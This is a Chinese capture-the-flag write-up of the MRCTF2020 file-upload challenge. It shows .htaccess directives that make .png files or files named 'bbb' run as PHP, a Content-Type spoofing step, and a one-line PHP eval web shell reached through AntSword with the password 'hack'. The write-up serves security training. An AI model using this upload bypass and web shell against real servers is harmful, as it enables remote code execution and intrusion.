[MRCTF2020]你傳你🐎呢之.htaccess

前言

        最近,也是遇到了文件上傳的文件,自己搭的靶場都不能用,今天,在這裡又遇到了這個題。簡單總結下,內容來自互聯網,若有侵權,聯繫我。

.htaccess簡介 

       .htaccess文件(分散式配置文件),提供了針對目錄改變配置的方法, 就是在一個特定的文件目錄中放置一個包含多個指令的文件,以作用於此

目 錄及其子目錄。作為用戶,所能使用的命令受到限制。管理員可以通過Apache 的allowOverride指令來設置。httpd.conf文件中設置

.htaccess的利用

  將下面的內容寫入.htaccess

0x01

這裡時是要包含bbb的文件,都會被當成php程式碼執行

<FilesMatch "bbb">
SetHandler application/x-httpd-php
</FilesMatch>

0x02

這種方法時,後面的.png文件能被當成php程式碼執行,如果想換成別的改擴展名就可以

AddType application/x-httpd-php .png

賽題詳解

這裡我們的思路是,將.htaccess文件上傳時,抓包,然後改Content-Type的類型為  image/jpeg的形式上傳,當然這道題,image/png的

文件類型也可以上傳,至於gif可不可以我沒有試,感覺應該可以。然後先上傳.htaccess文件,然後上傳圖片🐎,通過蟻劍去連接。好了,

廢話不多說了下面我們開始做題吧

0x01 上傳.htaccess文件

來到題目的頁面,我們上傳.htaccess,然後抓包改Content-Type的值,改成image/jpeg,然後放包。這裡我們用的是第二種

 

0x02 上傳圖片🐎 

改完之後,我們再繼續上傳圖片🐎就可以。當然要是以.png的後綴名文件。

bbb.png內容:

<?php eval($_POST['hack']);?>

我們在這裡上傳的是bbb.png文件

 

 

得到這個路徑,我們需要的是首頁的url拼接上upload後面的路徑:/upload/4c1f01c73cb453aec997d1699d8f0e75/bbb.png

0x03 蟻劍連接

然後通過蟻劍連接,密碼為hack。然後在根目錄下發現flag

 

 這樣,我們這道題就完成了。

總結一下,對這個.htaccess又加深了了解,不錯,頭疼了好幾天,之前上傳這個沒一個成功的。好了謝謝大家的觀看。覺得好的可以給個推薦,什麼的。

 

Tags: